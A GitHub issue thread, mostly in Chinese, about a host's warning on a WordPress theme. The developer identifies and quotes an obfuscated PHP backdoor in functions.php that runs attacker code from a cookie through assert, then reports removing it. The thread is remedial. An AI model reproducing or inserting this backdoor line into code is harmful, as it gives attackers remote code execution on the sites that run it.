### ISSUE TITLE
Kinsta 發現我們的 theme 裡面有 bad code!

### ISSUE THREAD

**Issue by popnfamily** [wake/kpopn-ninja#8]
Hey Wake ^^

今天為了從 linksalpha 換到 SNAP, 請 Kinsta 幫我們使用 SNAP ~ 他們在作業程序中發現了一段 bad code~ 說是我們目前的 theme 裡面的，所以我想說都要改版了，應該不用太在乎，又怕是我不懂，還是來這裡留言問你這樣的 code 是否可以再撐個1~2個月 (希望改版能快一點但你知道，要保手一點估計這樣)

他們說：FYI, your error log contains dozens of the following warning message, which is an issue related to your theme, it's not big deal yet, however we'd advise you to have a developer look at this.
2015/05/11 07:54:26 [error] 5830#0: *6247289 FastCGI sent in stderr: "PHP message: PHP Warning:  Constants may only evaluate to scalar values in /www/kpopn_141/public/wp-content/themes/arras151/functions.php on line 69" while reading response header from upstream, client: 108.162.245.80, server: www.kpopn.com, request: "GET /2011/06/14/69331/ HTTP/1.1", upstream: "fastcgi://unix:/var/run/php5-fpm-kpopn.sock:", host: "kpopn.com"

每次都很感謝你耶！

**Comment by wake** [comment]
那段 code 就是我上次提到被 hack 風險的 code

```
!defined("_E")&&define("_E",@array_map("as\x73\x65rt",(array)$GLOBALS[str_rot13('_PBBXVR')]['_e']));
```

其實只要請他們幫忙把這段 code 摘掉或註解掉就可以了 XD 放著不管我覺得有風險疑慮啊…

**Comment by wake** [comment]
kpopn 內的有問題，但是 apopn 的沒有，已經修正了 :stuck_out_tongue:

**Comment by popnfamily** [comment]
無比的感謝！
